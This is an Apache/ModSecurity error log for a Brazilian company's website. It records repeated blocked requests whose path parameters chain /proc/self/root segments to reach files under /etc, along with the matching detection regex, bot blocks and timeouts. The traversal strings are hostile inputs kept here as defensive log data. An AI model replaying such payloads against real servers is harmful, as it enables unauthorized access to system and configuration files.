"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn074Z5-GlpYjVrXCrgbQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:42:30.935410 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:37846] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/systemd/netif
[Tue Mar 17 21:42:30.935593 2026] [access_compat:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:37846] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/systemd/netif
[Tue Mar 17 21:42:42.113917 2026] [proxy_fcgi:error] [pid 17972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:43:05.129794 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60508] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:43:24.753110 2026] [core:alert] [pid 26799:tid 140411658000128] [client 74.7.241.31:58050] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/kbd/keymaps/legacy
[Tue Mar 17 21:43:27.149799 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60854] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:43:27.976098 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.244.43:42042] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn1L9a6ubjKNq_cu4YyBQAAA0U"]
[Tue Mar 17 21:43:33.078517 2026] [:error] [pid 17972:tid 140411540502272] [client 74.7.243.128:53478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn1NYZ5-GlpYjVrXCrgkgAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:43:37.327410 2026] [:error] [pid 17972:tid 140411582465792] [client 74.7.228.61:53488] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn1OYZ5-GlpYjVrXCrglQAAAlM"]
[Tue Mar 17 21:43:49.161788 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:43:51.757819 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:55944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn1RwkwaGbbGflqUZCvIwAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:43:55.542343 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:41330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn1S9Y0UrI5A3LftIwqvQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:44:10.106058 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:44:17.555532 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:41340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn1Yda6ubjKNq_cu4YyFwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:44:32.125881 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:44:55.045840 2026] [proxy_fcgi:error] [pid 25836:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:45:18.045828 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34396] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:45:40.134323 2026] [proxy_fcgi:error] [pid 17972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34748] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:46:02.144574 2026] [proxy_fcgi:error] [pid 17972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:46:06.348825 2026] [core:alert] [pid 17972:tid 140411616036608] [client 74.7.243.128:53478] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/log
[Tue Mar 17 21:46:25.132301 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35446] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:46:48.137807 2026] [proxy_fcgi:error] [pid 25836:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35798] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:47:09.121819 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:47:10.338024 2026] [mime_magic:error] [pid 18211:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:52734] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib
[Tue Mar 17 21:47:11.132025 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:40844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn2DwkwaGbbGflqUZCvXQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:47:31.126789 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:47:53.125810 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36816] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:48:15.125835 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:48:38.125364 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:48:59.137789 2026] [proxy_fcgi:error] [pid 11816:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38092] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:49:21.125646 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:49:48.837897 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38840] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:49:57.787563 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:40848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn2tcdf6f5d65gmYZRqqAAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:50:11.144324 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39214] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:50:32.069818 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39566] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:50:34.003214 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:60576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn22gkwaGbbGflqUZCvxgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:50:35.837870 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:55306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn229Y0UrI5A3LftIwrSgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:50:54.077931 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:51:16.137804 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:51:23.551614 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:44104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3Cxj0p0SRWAqcjGGluwAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:27.706355 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:36720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3D-yqAr6etmhZHNpS5gAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:29.851155 2026] [:error] [pid 17972:tid 140411741927168] [client 74.7.241.31:36724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3EYZ5-GlpYjVrXCrhWgAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:30.339956 2026] [:error] [pid 18211:tid 140411725141760] [client 74.7.243.128:56868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3EhcIZFNFgEhGGCRDQwAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:51:38.141807 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:51:38.824388 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:46974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3Gsdf6f5d65gmYZRqzgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:40.331470 2026] [:error] [pid 17972:tid 140411616036608] [client 74.7.241.31:46986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3HIZ5-GlpYjVrXCrhYQAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:41.986375 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:46996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3HdY0UrI5A3LftIwrawAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:51:43.878565 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:47000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3H8df6f5d65gmYZRq0QAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
